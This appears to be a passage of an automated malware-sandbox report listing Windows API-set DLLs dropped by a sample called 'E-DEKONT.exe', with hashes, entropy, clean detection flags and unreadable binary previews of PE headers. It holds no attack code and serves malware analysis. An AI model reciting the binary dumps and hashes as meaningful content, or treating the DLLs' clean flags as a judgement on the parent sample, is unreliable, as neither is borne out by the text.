                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.101895292899441
                                                                          Encrypted:false
                                                                          SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                                                                          MD5:D500D9E24F33933956DF0E26F087FD91
                                                                          SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                                                                          SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                                                                          SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.16337963516533
                                                                          Encrypted:false
                                                                          SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                                                                          MD5:6F6796D1278670CCE6E2D85199623E27
                                                                          SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                                                                          SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                                                                          SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):19248
                                                                          Entropy (8bit):7.073730829887072
                                                                          Encrypted:false
                                                                          SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                                                                          MD5:5F73A814936C8E7E4A2DFD68876143C8
                                                                          SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                                                                          SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                                                                          SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):19392
                                                                          Entropy (8bit):7.082421046253008
                                                                          Encrypted:false
                                                                          SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                                                                          MD5:A2D7D7711F9C0E3E065B2929FF342666
                                                                          SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                                                                          SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                                                                          SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.1156948849491055
                                                                          Encrypted:false
                                                                          SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                                                                          MD5:D0289835D97D103BAD0DD7B9637538A1
                                                                          SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                                                                          SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                                                                          SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):17712
                                                                          Entropy (8bit):7.187691342157284
                                                                          Encrypted:false
                                                                          SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                                                                          MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                                                                          SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                                                                          SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                                                                          SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):17720
                                                                          Entropy (8bit):7.19694878324007
                                                                          Encrypted:false
                                                                          SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                                                                          MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                                                                          SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                                                                          SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                                                                          SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.137724132900032
                                                                          Encrypted:false
                                                                          SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                                                                          MD5:12CC7D8017023EF04EBDD28EF9558305
                                                                          SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                                                                          SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                                                                          SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):20280
                                                                          Entropy (8bit):7.04640581473745
                                                                          Encrypted:false
                                                                          SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                                                          MD5:71AF7ED2A72267AAAD8564524903CFF6
                                                                          SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                                                          SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                                                          SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18744
                                                                          Entropy (8bit):7.138910839042951
                                                                          Encrypted:false
                                                                          SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                                                          MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                                                          SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                                                          SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                                                          SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):19248
                                                                          Entropy (8bit):7.072555805949365
                                                                          Encrypted:false
                                                                          SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                                                          MD5:19A40AF040BD7ADD901AA967600259D9
                                                                          SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                                                          SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                                                          SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18224
                                                                          Entropy (8bit):7.17450177544266
                                                                          Encrypted:false
                                                                          SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                                                          MD5:BABF80608FD68A09656871EC8597296C
                                                                          SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                                                          SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                                                          SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18232
                                                                          Entropy (8bit):7.1007227686954275
                                                                          Encrypted:false
                                                                          SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                                                          MD5:0F079489ABD2B16751CEB7447512A70D
                                                                          SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                                                          SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                                                          SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):19256
                                                                          Entropy (8bit):7.088693688879585
                                                                          Encrypted:false
                                                                          SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                                                          MD5:6EA692F862BDEB446E649E4B2893E36F
                                                                          SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                                                          SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                                                          SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):22328
                                                                          Entropy (8bit):6.929204936143068
                                                                          Encrypted:false
                                                                          SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                                                          MD5:72E28C902CD947F9A3425B19AC5A64BD
                                                                          SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                                                          SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                                                          SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):18736
                                                                          Entropy (8bit):7.078409479204304
                                                                          Encrypted:false
                                                                          SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                                                          MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                                                          SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                                                          SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                                                          SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):20280
                                                                          Entropy (8bit):7.085387497246545
                                                                          Encrypted:false
                                                                          SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                                                          MD5:AEC2268601470050E62CB8066DD41A59
                                                                          SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                                                          SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                                                          SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................

                                                                          C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dll

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
